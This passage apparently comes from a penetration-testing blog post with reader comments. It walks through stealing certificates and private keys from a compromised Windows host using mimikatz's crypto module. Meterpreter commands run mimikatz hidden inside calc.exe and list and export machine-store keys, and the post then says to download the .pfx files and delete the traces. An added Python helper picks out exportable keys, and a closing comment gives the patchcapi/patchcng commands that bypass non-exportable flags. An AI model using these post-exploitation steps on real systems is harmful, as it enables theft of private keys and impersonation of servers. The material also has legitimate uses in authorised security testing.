But now that it's working in memory, you can do lots more with it. Below are the various modules (descriptions translated from the tool's French help text):
standard ; basic commands
crypto ; cryptography and certificates
sekurlsa ; dump of Windows hashes and passwords
system ; system management
process ; process manipulation
thread ; thread manipulation
service ; service manipulation
privilege ; privilege manipulation
winmine ; manipulation of the Windows XP Minesweeper (demonstration)
minesweeper ; manipulation of the Windows Vista and 7 Minesweeper (demonstration)
nogpo ; to get around a few trivial GPOs
samdump ; offline SAM dump
inject ; library injector
ts ; Terminal Server manipulations
divers ; miscellaneous functions too small to stand on their own
The crypto module does some interesting things. I briefly talked about stealing certificates at DerbyCon; the crypto module helps you do exactly that. Use
crypto::listKeys, crypto::listProviders, crypto::listStores, crypto::listCertificates
to identify the keys and certificates on the host that you want for yourself, then
crypto::exportKeys and crypto::exportCertificates
to take them home. It looks something like this:
meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listStores" exit'
Process 9904 created.
Channel 20 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 8 2012 15:18:27) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::listStores
Location : 'CERT_SYSTEM_STORE_CURRENT_USER'
My
Root
Trust
CA
TrustedPublisher
Disallowed
AuthRoot
TrustedPeople
ADDRESSBOOK
mimikatz(commandline) # exit
meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit'
Process 3472 created.
Channel 12 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My
Location : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
- sqlapps01
Key container : SELFSSL
Provider : Microsoft RSA SChannel Cryptographic Provider
Type : AT_KEYEXCHANGE
Exportable : YES
Key size : 1024
mimikatz(commandline) # exit
meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit'
Process 6112 created.
Channel 23 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE
Location : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
- MACHINENAME
Key container : SELFSSL
Provider : Microsoft RSA SChannel Cryptographic Provider
Type : AT_KEYEXCHANGE
Exportable : YES
Key size : 1024
Private export to 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.pfx' : OK
Public export to 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.der' : OK
mimikatz(commandline) # exit
The export files are written to the working directory of the mimikatz process on the target; once exported, download the .pfx (private key) and .der (public certificate) files, for example with Meterpreter's download command, and clean them up afterwards. Note the "Exportable : YES" line in the listing: a key flagged as non-exportable will not come out with a plain export, so check that line before you bother exporting.
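A busy host can have dozens of entries in the machine store, so here is a small Python triage helper for the crypto::listCertificates / crypto::exportCertificates output shown above. This is an added example, not code from the original post or from mimikatz. mimikatz 1.0 prints French labels (as in the original transcript), so the label table accepts those and their English equivalents. The sample transcript is constructed from the session on this page; the second entry (webproxy01, marked NON) is an assumed addition to show a non-exportable key.

```python
"""Parse mimikatz 1.0 crypto::listCertificates / crypto::exportCertificates output
and list the entries whose private key can be exported without CAPI/CNG patching.
Added example, not code from the original post or from mimikatz."""
import re

# Field labels as printed by mimikatz 1.0 (French), plus English equivalents.
LABELS = {
    "Container Clé": "container", "Key container": "container",
    "Provider": "provider",
    "Type": "key_type",
    "Exportabilité": "exportable", "Exportable": "exportable",
    "Taille clé": "key_size", "Key size": "key_size",
}

# "Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My" -> store plus optional sub-store
STORE_RE = re.compile(r"^(?:Emplacement|Location)\s*:\s*'([^']+)'(?:\\(\S+))?")
# " - sqlapps01" -> start of one certificate entry
CERT_RE = re.compile(r"^- (.+)$")
# "Export privé dans 'file.pfx' : OK" / "Private export to 'file.pfx' : OK"
EXPORT_RE = re.compile(
    r"^(?:Export (?P<fr>priv\S*|public) \S+|(?P<en>Private|Public) export \S+)"
    r" '(?P<file>[^']+)'\s*:\s*(?P<status>\w+)")
# generic "label : value" line inside an entry
FIELD_RE = re.compile(r"^(.+?)\s*:\s*(.+)$")


def parse_certificates(text):
    """Return (certs, exports): one dict per certificate entry and one
    (kind, filename, status) tuple per export result line."""
    certs, exports = [], []
    store, cur = None, None
    for raw in text.splitlines():
        line = raw.strip()
        m = STORE_RE.match(line)
        if m:
            store = m.group(1) + ("\\" + m.group(2) if m.group(2) else "")
            cur = None
            continue
        m = CERT_RE.match(line)
        if m:
            cur = {"store": store, "name": m.group(1).strip()}
            certs.append(cur)
            continue
        m = EXPORT_RE.match(line)
        if m:
            kind = m.group("fr") or m.group("en")
            kind = "private" if kind.lower().startswith("priv") else "public"
            exports.append((kind, m.group("file"), m.group("status")))
            continue
        m = FIELD_RE.match(line)
        if m and cur is not None and m.group(1) in LABELS:
            key, val = LABELS[m.group(1)], m.group(2).strip()
            if key == "exportable":
                val = val.upper() in ("OUI", "YES")
            elif key == "key_size":
                val = int(val)
            cur[key] = val
    return certs, exports


def exportable_private_keys(certs, min_key_size=2048):
    """Entries whose private key comes out with a plain export (no patchcapi/patchcng
    needed); the last field flags keys shorter than min_key_size bits."""
    return [(c["store"], c["name"], c.get("key_size"), c.get("key_size", 0) < min_key_size)
            for c in certs if c.get("exportable")]


# Constructed sample based on the session on the page; the webproxy01 entry
# (marked NON, i.e. non-exportable) is assumed for illustration.
SAMPLE = """\
mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\\My
 - sqlapps01
    Container Clé : SELFSSL
    Provider : Microsoft RSA SChannel Cryptographic Provider
    Type : AT_KEYEXCHANGE
    Exportabilité : OUI
    Taille clé : 1024
 - webproxy01
    Container Clé : IIS-WEB
    Provider : Microsoft RSA SChannel Cryptographic Provider
    Type : AT_KEYEXCHANGE
    Exportabilité : NON
    Taille clé : 2048
Export privé dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.pfx' : OK
Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.der' : OK
mimikatz(commandline) # exit
"""

if __name__ == "__main__":
    certs, exports = parse_certificates(SAMPLE)
    for store, name, size, weak in exportable_private_keys(certs):
        print(f"{store} {name}: {size}-bit, exportable{' (weak key)' if weak else ''}")
    for kind, path, status in exports:
        print(f"{kind} export -> {path}: {status}")
```

Feed it the saved Meterpreter channel output instead of SAMPLE and you get the list of keys worth pulling, the file names to download, and a flag on anything with a key shorter than 2048 bits, which is a finding in its own right.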
Maybe the next mimikatz feature can be Internet-happy English translations
No
:)
btw, don't forget:
- crypto::patchcapi
or/and
- privilege::debug
- crypto::patchcng
it exports "non-exportable" ;)